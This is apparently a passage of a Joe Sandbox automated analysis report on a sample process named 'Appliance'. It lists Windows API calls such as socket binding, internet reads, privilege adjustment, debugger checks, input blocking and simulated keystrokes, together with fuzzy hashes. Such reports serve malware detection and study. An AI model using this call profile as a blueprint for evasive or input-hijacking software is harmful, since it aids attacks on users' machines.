                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                            • Opcode ID: 7bf3b25db7af6f6c9765fe19d911d64db12604e4437181de53a339bdca8f3535
                                                                                                                                            • Instruction ID: 954843f704e80a35c79f905bd2a54db776432eb556caf8eba0aa208bd5ad73e9
                                                                                                                                            • Opcode Fuzzy Hash: 7bf3b25db7af6f6c9765fe19d911d64db12604e4437181de53a339bdca8f3535
                                                                                                                                            • Instruction Fuzzy Hash: AF11AC71502614FFDB249F65EC09FAE7BA9EF8436AF14841CEA41B7160C735A944CB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E3A5BD
                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E3A6D0
                                                                                                                                              • Part of subcall function 00E342B9: GetInputState.USER32 ref: 00E34310
                                                                                                                                              • Part of subcall function 00E342B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E343AB
                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E3A5ED
                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E3A6BA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                            • Opcode ID: 2e80fa6a7f930a26a17b84e1c049dce1758f4058da50e126b48bc361d682d72e
                                                                                                                                            • Instruction ID: 789573b6245ba5cc7f7eab81b9fe1a97c7dd16fb4c50018959ca3bbd8cf70363
                                                                                                                                            • Opcode Fuzzy Hash: 2e80fa6a7f930a26a17b84e1c049dce1758f4058da50e126b48bc361d682d72e
                                                                                                                                            • Instruction Fuzzy Hash: 7441307190420AAFCB14DF65C84AAEE7BB5EF05314F185469E445B21A1EB31DE84CF61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E43AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E43AD7
                                                                                                                                              • Part of subcall function 00E43AAB: _wcslen.LIBCMT ref: 00E43AF8
                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E422BA
                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00E422E1
                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00E42338
                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00E42343
                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00E42372
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                            • Opcode ID: ab027a6910eca2b1d35eef5d3c9595e0af56344c08dfaeb18cd826ac1a370df7
                                                                                                                                            • Instruction ID: bfd4f081053ddb0f81e6116f2e3286504d0fe17d809baecd3a9c6e251bdf289a
                                                                                                                                            • Opcode Fuzzy Hash: ab027a6910eca2b1d35eef5d3c9595e0af56344c08dfaeb18cd826ac1a370df7
                                                                                                                                            • Instruction Fuzzy Hash: 2051D175A00201AFE720AF64C886F2A77E5EB44718F54848CF945AF3D3CB71AC418BB1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                            • Opcode ID: 606d8d482b699c980ea98ac0539af3256fff4047c46384f43630d08f32e97b86
                                                                                                                                            • Instruction ID: 15c746376a5762147a2b2c3cdb02919f8badbf332f82742bbacfd8b318d62a9e
                                                                                                                                            • Opcode Fuzzy Hash: 606d8d482b699c980ea98ac0539af3256fff4047c46384f43630d08f32e97b86
                                                                                                                                            • Instruction Fuzzy Hash: 032107317002018FD725DF26C844B5A7BD4EF8A316F18986EED49AB251D771DC4AC7A0
                                                                                                                                            APIs
                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00E3D8CE
                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00E3D92F
                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00E3D943
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                            • Opcode ID: c492661886fbe167280857fbb959ff1aca5fc2e011d58c38574baff3bf9c399c
                                                                                                                                            • Instruction ID: db11eeff31fd88ab7aa448f689a13a5fcf8ee2257a903c5b6a02a7503451ce6b
                                                                                                                                            • Opcode Fuzzy Hash: c492661886fbe167280857fbb959ff1aca5fc2e011d58c38574baff3bf9c399c
                                                                                                                                            • Instruction Fuzzy Hash: 89219071508705AFE731DF66EC48BAABBFCEB80318F105419E646B2151E7B0EA08CB60
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(?,00E046AC), ref: 00E2E482
                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00E2E491
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E2E4A2
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E2E4AE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                            • Opcode ID: b6f730e3fa7d78956da9bdfe92aa4a9cfd424b2741d531772f917a088777f293
                                                                                                                                            • Instruction ID: d1709caa63de475f5964b641b077b56429948089408d94ff46f6e556c753210f
                                                                                                                                            • Opcode Fuzzy Hash: b6f730e3fa7d78956da9bdfe92aa4a9cfd424b2741d531772f917a088777f293
                                                                                                                                            • Instruction Fuzzy Hash: 35F0A730814A345B92247738BC0D4AA766DAF0233AB504B06F836E21F0D77499994596
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                            • Opcode ID: d1c29ec28a60a0ece085b724a434f025ee10109dcda2de5be1856ae1f86691d7
                                                                                                                                            • Instruction ID: 4444e2bbdd33af454452748a1d87d3573ff12aeed8844c005a6de3035494a4cc
                                                                                                                                            • Opcode Fuzzy Hash: d1c29ec28a60a0ece085b724a434f025ee10109dcda2de5be1856ae1f86691d7
                                                                                                                                            • Instruction Fuzzy Hash: 72D012B1C08208DACB9097909D48CF9737CAB28300F905852FD06B1200E620D9C89731
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00DF2A8A
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00DF2A94
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00DF2AA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 59a996f26fa0b4b7274bd37849507828fb64eb5b5b9274738ea5c73ba38c2a01
                                                                                                                                            • Instruction ID: 8721ed7db0a8c32b0fb4f136d58c6af2178eafbdd51b912ec1d79875c7956f4b
                                                                                                                                            • Opcode Fuzzy Hash: 59a996f26fa0b4b7274bd37849507828fb64eb5b5b9274738ea5c73ba38c2a01
                                                                                                                                            • Instruction Fuzzy Hash: 5731D57490122C9BCB21DF69DD8879CBBB8AF08310F5082DAE80CA7260E7709F85CF55
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DE014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DE09D8
                                                                                                                                              • Part of subcall function 00DE014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DE09F5
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E2205A
                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E22087
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E22097
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                            • Opcode ID: 5d373202a1470d3800cfe6c183dbe66cff9b0618f6b62ad81213a58206598a53
                                                                                                                                            • Instruction ID: 630b2ae4ddabc0f8f9de43dd6210092ab913b30157340d5e37cb87fc19f506c2
                                                                                                                                            • Opcode Fuzzy Hash: 5d373202a1470d3800cfe6c183dbe66cff9b0618f6b62ad81213a58206598a53
                                                                                                                                            • Instruction Fuzzy Hash: F811BFB1404304BFD728AF54EC86D6BBBB8EB04710F20841EE146A7251DBB0BC81CA30
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002,00000000), ref: 00DE5079
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002,00000000), ref: 00DE5080
                                                                                                                                            • ExitProcess.KERNEL32 ref: 00DE5092
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 3e3695503fd6ee022a9fc88b9df1d8c041430c6d5858fbdd573b75e638a86274
                                                                                                                                            • Instruction ID: b21e211b631403e59a1e2b840ab74b6e59f2910cbb82d2b623ddad37b3f60959
                                                                                                                                            • Opcode Fuzzy Hash: 3e3695503fd6ee022a9fc88b9df1d8c041430c6d5858fbdd573b75e638a86274
                                                                                                                                            • Instruction Fuzzy Hash: 9EE08C31001A88AFCF217F52EE08E583F69EF10386F054414F809AA131DB35DD42CBE0
                                                                                                                                            APIs
                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E2ED04
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: mouse_event
                                                                                                                                            • String ID: DOWN
                                                                                                                                            • API String ID: 2434400541-711622031
                                                                                                                                            • Opcode ID: f1d80dd769676fd2374c271ae3e94180193613e6034b3ee0e5b4d53312213902
                                                                                                                                            • Instruction ID: cafe036112f309788a95c8e6f0f086bb48c0143b2e43035d50fc871ffdfa30aa
                                                                                                                                            • Opcode Fuzzy Hash: f1d80dd769676fd2374c271ae3e94180193613e6034b3ee0e5b4d53312213902
                                                                                                                                            • Instruction Fuzzy Hash: B1E08C266AD77238B90831297C07EF6434C8F22B39B112246F808F41D0ED905C8251B8
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00E1E664
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID: X64
                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                            • Opcode ID: 7bfeb5e32619c116b220cd31bdede54ce41bf60a577c62fb890abff5cba3b995
                                                                                                                                            • Instruction ID: 4690f24bae11d1f032c34f51dd8fdc433873ac1bf5ba294ad0837a733f847b2f
                                                                                                                                            • Opcode Fuzzy Hash: 7bfeb5e32619c116b220cd31bdede54ce41bf60a577c62fb890abff5cba3b995
                                                                                                                                            • Instruction Fuzzy Hash: A1D0C9B480521DEACF90CB50EC88DD9737CBB04304F100A52F546B2140D73095888B20
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34229
                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34239
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                            • Opcode ID: 6a77dd40fc874f0c6b4254a520a5aeca0e7e40f09bd8ae8d560c204028ede320
                                                                                                                                            • Instruction ID: 8163bf080fed8e668a675a11334b3f9820c64aeff59de52df66e9fd2ecdb3bfb
                                                                                                                                            • Opcode Fuzzy Hash: 6a77dd40fc874f0c6b4254a520a5aeca0e7e40f09bd8ae8d560c204028ede320
                                                                                                                                            • Instruction Fuzzy Hash: F1F0E5706043256AEB2016A69C4DFEB3AADEFC5761F000179F505F31D1D9709944C6B1
                                                                                                                                            APIs
                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E2BC24
                                                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00E2BC37
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InputSendkeybd_event
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3536248340-0
                                                                                                                                            • Opcode ID: f4bef612739d498e9afa2f054e1b0a134e042322964eae1f4133e270ae4c0d82
                                                                                                                                            • Instruction ID: c974333831f2fd2dce9a8730b752d51465d9bd888d64f4d239484ab7da6b9dac
                                                                                                                                            • Opcode Fuzzy Hash: f4bef612739d498e9afa2f054e1b0a134e042322964eae1f4133e270ae4c0d82
                                                                                                                                            • Instruction Fuzzy Hash: 0BF0677080424EAFDB059FA1D806BFEBFB0FF08309F00940AF951AA192D3798205DF94
                                                                                                                                            APIs
                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E21B48), ref: 00E21A20
                                                                                                                                            • CloseHandle.KERNEL32(?,?,00E21B48), ref: 00E21A35
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                            • Opcode ID: 8ab5a392651ca473537cdc70bde06119f7e72a5e2a9b6d8d5c25de1bee51a8f8
                                                                                                                                            • Instruction ID: 237ac5720dc942965b6c9bb283a5de3528459051400c43482519af890f4ac97c
                                                                                                                                            • Opcode Fuzzy Hash: 8ab5a392651ca473537cdc70bde06119f7e72a5e2a9b6d8d5c25de1bee51a8f8
                                                                                                                                            • Instruction Fuzzy Hash: C9E0BF72018750AFE7252B11FC05F777BA9EB04311F14895DF595D44B0DBA26CD1DB60
                                                                                                                                            APIs
                                                                                                                                            • BlockInput.USER32(00000001), ref: 00E3F51A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
